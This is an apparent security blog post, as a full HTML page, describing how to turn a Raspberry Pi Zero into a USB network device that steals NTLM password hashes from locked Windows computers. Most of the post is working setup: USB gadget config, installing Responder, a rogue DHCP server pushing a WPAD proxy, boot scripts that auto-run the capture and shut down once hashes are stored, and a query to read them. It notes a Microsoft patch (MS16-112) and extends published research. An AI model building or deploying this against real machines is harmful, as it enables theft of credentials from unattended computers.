<!DOCTYPE html>
<html lang="en-US">
<head>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />

  	<meta property="og:title" content=" Raspberry Pi Zero for credential snagging &middot;  Zone13.io" />
  	<meta property="og:site_name" content="Zone13.io" />
  	<meta property="og:url" content="https://zone13.io/post/Raspberry-Pi-Zero-for-credential-snagging/" />

    
  	<meta property="og:type" content="article" />

    <meta property="og:article:published_time" content="2016-09-18T12:13:05&#43;01:00" />

    
    <meta property="og:article:tag" content="Raspberry Pi" />
    
    <meta property="og:article:tag" content="Pi Zero" />
    
    <meta property="og:article:tag" content="Responder" />
    
    

  <title>
     Raspberry Pi Zero for credential snagging &middot;  Zone13.io
  </title>

    <meta name="description" content="Information Security Blog" />

    <meta name="HandheldFriendly" content="True" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="shortcut icon" href="https://zone13.io/images/favicon.ico">
	  <link rel="apple-touch-icon" href="https://zone13.io/images/apple-touch-icon.png" />

    <link rel="stylesheet" type="text/css" href="https://zone13.io/css/screen.css" />
    <link rel="stylesheet" type="text/css" href="https://zone13.io/css/nav.css" />
	
	<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Merriweather:300,700,700italic,300italic|Open+Sans:700,400|Inconsolata" />


	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.7.0/styles/default.min.css">
	<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.7.0/highlight.min.js"></script>
	<script>hljs.initHighlightingOnLoad();</script>
	
	
	
	
	
	

    
      
          <link href="https://zone13.io/index.xml" rel="alternate" type="application/rss+xml" title="Zone13.io" />
      
      
    
    <meta name="generator" content="Hugo 0.16" />

    <link rel="canonical" href="https://zone13.io/post/Raspberry-Pi-Zero-for-credential-snagging/" />

    
    <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

      ga('create', 'UA-84537506-1', 'auto');
      ga('send', 'pageview');

    </script>
    

    

	

</head>

<body class="nav-closed">

  <div class="nav">
    <h3 class="nav-title">Menu</h3>
    <a href="#" class="nav-close">
        <span class="hidden">Close</span>
    </a>
    <ul>
        
        
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://zone13.io/">Home</a>
            </li>
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://zone13.io/info/Disclaimer/">Disclaimer</a>
            </li>
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://zone13.io/info/about-me/">About me</a>
            </li>
        
    </ul>
    
    
    <a class="subscribe-button icon-feed" href="https://zone13.io/index.xml">Subscribe</a>
    
</div>
<span class="nav-cover"></span>


 <div class="site-wrapper">

 



<header class="main-header post-head no-cover">
  <nav class="main-nav clearfix">


  
      <a class="blog-logo" href="https://zone13.io/" /><span class="icon-home" style="color:blue;font-size:3em"></span></a>
  
  
      <a class="menu-button" href="#"><span class="burger">&#9776;</span><span class="word">Menu</span></a>
  
  </nav>
</header>



<main class="content" role="main">




  <article class="post post">

    <header class="post-header">
        <h1 class="post-title">Raspberry Pi Zero for credential snagging</h1>
        <small></small>

        <section class="post-meta">
        
          <time class="post-date" datetime="2016-09-18T12:13:05&#43;01:00">
            Sep 18, 2016
          </time>
        
         
          <span class="post-tag small"><a href="https://zone13.io/tags/raspberry-pi/">#Raspberry Pi</a></span>
         
          <span class="post-tag small"><a href="https://zone13.io/tags/pi-zero/">#Pi Zero</a></span>
         
          <span class="post-tag small"><a href="https://zone13.io/tags/responder/">#Responder</a></span>
         
        </section>
    </header>

    <section class="post-content">
      

<blockquote>
<p>Update: <strong>CVE-2016-3302</strong> / <strong>MS16-112</strong> patch was released by Microsoft to fix the issue.</p>
</blockquote>

<h3 id="introduction">Introduction</h3>

<p>This post is an extension to Rob Fuller&rsquo;s (@mubix) work - <a href="https://room362.com/post/2016/snagging-creds-from-locked-machines/">https://room362.com/post/2016/snagging-creds-from-locked-machines/</a> to see how a Raspberry Pi Zero can be used for credential snagging. All credits go to @mubix for the original research. It is recommended to read mubix&rsquo;s post (if you haven&rsquo;t already !) before proceeding.</p>

<p><img src="https://zone13.io/images/pizero.jpeg" alt="" style="width:600px" /></p>

<h3 id="prerequisites">Prerequisites</h3>

<h4 id="software">Software</h4>

<p>This will <strong>only</strong> work if the target Windows system has <a href="https://en.wikipedia.org/wiki/RNDIS">RNDIS</a> drivers installed. The driver doesn&rsquo;t seem to install automatically (like when you plug in a new mouse or any USB accessory) and has to be installed manually as explained <a href="https://github.com/ev3dev/ev3dev/wiki/Setting-Up-Windows-USB-Ethernet-Networking">here</a> after booting up the Pi Zero for the first time.</p>

<h4 id="hardware">Hardware</h4>

<ol>
<li>Raspberry Pi Zero (I have v1.3)</li>
<li>Micro SD card (4GB or more) with <a href="https://www.raspberrypi.org/downloads/raspbian/">Raspbian Jessie</a> (I used Jessie Lite, Release date: 2016-05-27)<br /></li>
<li>Micro USB cable (any cable that supports data transfer - try those coming with mobiles)</li>
</ol>

<h3 id="procedure">Procedure</h3>

<p>I&rsquo;m setting up the Pi Zero from my Windows machine (Windows 8.1). If you are working from a different OS, adopt any changes as necessary (Google is your best friend :)).</p>

<p>I assume that you have already installed the Raspbian Jessie Lite OS on the Micro SD card. On Windows, I prefer to use the <a href="https://sourceforge.net/projects/win32diskimager/">Win32DiskImager</a>. If you are not familiar with the OS flashing process, refer <a href="https://www.raspberrypi.org/documentation/installation/installing-images/">here</a>.</p>

<h4 id="pi-zero-usb-gadget-setup">Pi Zero USB gadget setup</h4>

<p>Insert the Micro SD card with Raspbian OS into a suitable card reader and plug it into the Windows system. Open the boot partition in Windows explorer.</p>

<p>Two files need to be edited here:</p>

<p><strong>config.txt</strong></p>

<p>Append the following on a new line:</p>

<pre><code>dtoverlay=dwc2
</code></pre>

<p>The resulting file looks like <a href="https://github.com/zone13/pi-Zero-USB-Ethernet/blob/master/config.txt">this</a>.</p>

<p><strong>cmdline.txt</strong></p>

<p>Insert the following after <strong>rootwait</strong>:</p>

<pre><code>modules-load=dwc2,g_ether
</code></pre>

<p>Be careful with the formatting on this one, the values are separated by spaces.</p>

<p>The resulting file looks like <a href="https://github.com/zone13/pi-Zero-USB-Ethernet/blob/master/cmdline.txt">this</a>.</p>

<p>Once both the files are edited and saved, eject the Micro SD card and insert into the Pi Zero slot. Connect the Pi Zero to the Windows system using the Micro USB cable.</p>

<blockquote>
<p>Note: The cable has to be connected to the Micro USB port of Pi Zero to be used as a USB gadget.</p>
</blockquote>

<h4 id="pi-zero-packages-setup">Pi Zero packages setup</h4>

<p>If the Pi Zero is not detected by Windows system after booting up, it means that RNDIS drivers are not installed. The drivers can be installed by following the procedure <a href="https://github.com/ev3dev/ev3dev/wiki/Setting-Up-Windows-USB-Ethernet-Networking">here</a>.</p>

<p>Once the RNDIS devices are installed, the new USB Ethernet will be visible under <strong>Network Connections</strong>.</p>

<p><img src="https://zone13.io/images/net_conns_adapter.png" alt="net_conns_adapter" /></p>

<blockquote>
<p>Note: I have renamed my adapter as <strong>PiZero</strong> and hence displayed above.</p>
</blockquote>

<p>There are a number of packages that need to be installed on the Pi Zero to be used a credential snagging device. For this to happen, the Pi Zero will need Internet access.</p>

<p>I decided to share my LAN Internet with Pi Zero for this purpose. You can do the same or even share your Wi-Fi Internet.</p>

<p><img src="https://zone13.io/images/share_internet.png" alt="share_internet" /></p>

<p>At this stage you should be able to ping Pi Zero (hostname: <em>raspberrypi.local</em>)</p>

<p><img src="https://zone13.io/images/ping_pizero_local.png" alt="ping_pizero_local" /></p>

<p>Now, you can SSH to Pi Zero using the hostname.</p>

<p>The default credentials are:</p>

<blockquote>
<p>username: pi</p>

<p>password: raspberry</p>
</blockquote>

<p><img src="https://zone13.io/images/putty_settings.png" alt="putty_settings" /></p>

<p>At this point, it is a good idea to check Internet connectivity for the Pi Zero (e.g. try pinging google.com). If the ping can resolve to IP (not getting a ping response is alright), you are good to go. If there is some connectivity error, try running:</p>

<pre><code class="language-sh">sudo dhclient usb0
</code></pre>

<p>Now, proceed with running the below commands in order:</p>

<pre><code class="language-sh">sudo apt-get update
sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server python-crypto inotify-tools

sudo mkdir tools
cd tools
sudo git clone https://github.com/lgandx/Responder.git
</code></pre>

<h4 id="configure-a-static-ip">Configure a static IP</h4>

<p>Open /etc/network/interfaces</p>

<pre><code class="language-sh">sudo nano /etc/network/interfaces
</code></pre>

<p>Paste the below code at the end of the file:</p>

<pre><code class="language-sh">auto usb0
allow-hotplug usb0
iface usb0 inet static
  address 192.168.2.201
  netmask 255.255.255.0
  gateway 192.168.2.1
</code></pre>

<p><img src="https://zone13.io/images/etc_interfaces.png" alt="etc_interfaces" /></p>

<h4 id="dhcp-server-setup">DHCP server setup</h4>

<p>Backup the existing config file and create a new one for our setup</p>

<pre><code class="language-sh">sudo mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bkp
sudo nano /etc/dhcp/dhcpd.conf
</code></pre>

<p>Paste the below code:</p>

<pre><code class="language-sh">ddns-update-style none;

option domain-name &quot;domain.local&quot;;
option domain-name-servers 192.168.2.201;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.1 192.168.2.2;
  option routers 192.168.2.201;
  option local-proxy-config &quot;http://192.168.2.201/wpad.dat&quot;;
}
</code></pre>

<h4 id="run-scripts-at-boot">Run scripts at boot</h4>

<p>Open the /etc/rc.local file.</p>

<pre><code class="language-sh">sudo nano /etc/rc.local
</code></pre>

<p>Paste the below code before <strong>exit 0</strong>.</p>

<pre><code class="language-sh"># Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start DHCP server
/usr/sbin/dhcpd

# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /home/pi/tools/responder/; python Responder.py -I usb0 -f -w -r -d -F'

# Monitor Responder.db and shutdown once the hashes are captured
echo &quot;Staring cred watch&quot; &gt;&gt; /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /home/pi/tools/responder/Responder.db; do shutdown -h now; done'
</code></pre>

<h4 id="create-logs-for-screen-sessions">Create logs for screen sessions</h4>

<p>Create a <strong>logs</strong> folder:</p>

<pre><code class="language-sh">sudo mkdir /root/logs
</code></pre>

<p>Add a .screenrc file</p>

<pre><code class="language-sh">sudo nano /root/.screenrc
</code></pre>

<p>Paste the below code in .screenrc file:</p>

<pre><code class="language-sh"># Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log
</code></pre>

<p>That concludes the setup.</p>

<h3 id="conclusion">Conclusion</h3>

<p>Try plugging in the Pi Zero to a locked Windows PC and wait. If all goes well, the Responder.db file will be created at <strong>/home/pi/tools/responder/</strong> and hashes will be stored.</p>

<p>The captured hashes can be viewed using <strong>sqlite3</strong>.</p>

<pre><code class="language-sh">sqlite3 /home/pi/tools/responder/Responder.db
select * from responder;
</code></pre>

<p><img src="https://zone13.io/images/sqlite3_out.png" alt="sqlite3_out" /></p>

    </section>


  <footer class="post-footer">


    
    <figure class="author-image">
        <a class="img" href="https://zone13.io/" style="background-image: url(https://zone13.io/images/thumbnail.png)"><span class="hidden">Sid's Picture</span></a>
    </figure>
    

    





<section class="author">
  <h4><a href="https://zone13.io/">Sid</a></h4>
  
  <p>Information Security Professional</p>
  
  <div class="author-meta">
    <span class="author-location icon-location">Dublin, Ireland</span>
   
	<span class="author-link icon-linkedin" style="color:white;font-size:1em"><a href="https://www.linkedin.com/in/siddhuy">siddhuy</a></span>
  </div>
</section>



    
<section class="share">
  <h4>Share this post</h4>
  <a class="icon-twitter" style="font-size: 1.4em" href="https://twitter.com/share?text=Raspberry%20Pi%20Zero%20for%20credential%20snagging&nbsp;-&nbsp;Zone13.io&amp;url=https%3a%2f%2fzone13.io%2fpost%2fRaspberry-Pi-Zero-for-credential-snagging%2f"
      onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
      <span class="hidden">Twitter</span>
  </a>
  <a class="icon-facebook" style="font-size: 1.4em" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2fzone13.io%2fpost%2fRaspberry-Pi-Zero-for-credential-snagging%2f"
      onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
      <span class="hidden">Facebook</span>
  </a>
  <a class="icon-pinterest" style="font-size: 1.4em" href="http://pinterest.com/pin/create/button/?url=https%3a%2f%2fzone13.io%2fpost%2fRaspberry-Pi-Zero-for-credential-snagging%2f&amp;description=Raspberry%20Pi%20Zero%20for%20credential%20snagging"
      onclick="window.open(this.href, 'pinterest-share','width=580,height=296');return false;">
      <span class="hidden">Pinterest</span>
  </a>
  <a class="icon-google-plus" style="font-size: 1.4em" href="https://plus.google.com/share?url=https%3a%2f%2fzone13.io%2fpost%2fRaspberry-Pi-Zero-for-credential-snagging%2f"
     onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;">
      <span class="hidden">Google+</span>
  </a>
</section>



    

<div id="disqus_thread"></div>
<script type="text/javascript">
  var disqus_shortname = 'zone13-io';
  var disqus_url = 'https:\/\/zone13.io\/post\/Raspberry-Pi-Zero-for-credential-snagging\/';
  (function() {
    var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
  })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>




  </footer>
</article>

</main>
    <footer class="site-footer clearfix">
        <section class="copyright"><a href="">Zone13.io</a> All rights reserved - 2016</section>
		
        <section class="poweredby"> Powered by <a class="icon-hugo" href="http://gohugo.io">HUGO</a>, with <a class="icon-theme" href="https://github.com/vjeantet/hugo-theme-casper">Casper</a> theme</section>
        
    </footer>
    </div>
    <script type="text/javascript" src="https://zone13.io/js/jquery.js"></script>
    <script type="text/javascript" src="https://zone13.io/js/jquery.fitvids.js"></script>
    <script type="text/javascript" src="https://zone13.io/js/index.js"></script>
    
</body>
</html>

